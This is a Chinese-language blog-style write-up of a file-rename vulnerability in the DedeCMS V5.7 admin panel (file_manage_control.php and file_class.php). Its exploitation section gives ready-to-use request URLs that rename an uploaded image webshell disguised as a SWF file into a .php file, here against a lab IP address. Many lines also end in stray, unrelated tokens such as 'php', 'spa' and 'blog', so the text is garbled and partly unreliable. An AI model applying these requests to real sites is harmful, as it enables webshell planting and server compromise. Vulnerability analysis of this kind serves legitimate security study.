0x01 漏洞分析
漏洞文件: dede/file_manage_control.php ,$fmdo 開始時賦值,因此咱們能夠使fmdo=rename ,使其進入 if語句 ,調用 FileManagement 對象的 RenameFile 方法,跟進 RenameFile 方法。php
關於這裏的$fmdo變量,咱們能夠找找這個變量怎麼來的函數
Ok那這裏知道這個$fmdo變量是能夠咱們傳遞控制獲得。url
那咱們跟進這個RenameFile函數spa
RenameFile函數位於/dede/file_class.php:code
看到 $oldname 和 $newname 直接拼接生成,沒有對文件名進行過濾,直接致使漏洞發生。因此最終payload爲:對象
/dede/file_manage_control.php?fmdo=rename&oldfilename=你上傳文件的路徑&newfilename=你想寫的路徑
0x02 漏洞利用
登陸後臺後 能夠上傳一個圖片馬blog
這裏能夠看到上傳的swf文件路徑,接下來構造url更名,使其變爲php後綴馬圖片
訪問:class
http://192.168.5.149/DedeCMS-V5.7/uploads/dede/file_manage_control.php?fmdo=rename&oldfilename=/DedeCMS-V5.7/uploads/uploads/media/190511/1_1555226071.SWF&newfilename=/secquan.php
顯示上傳成功登錄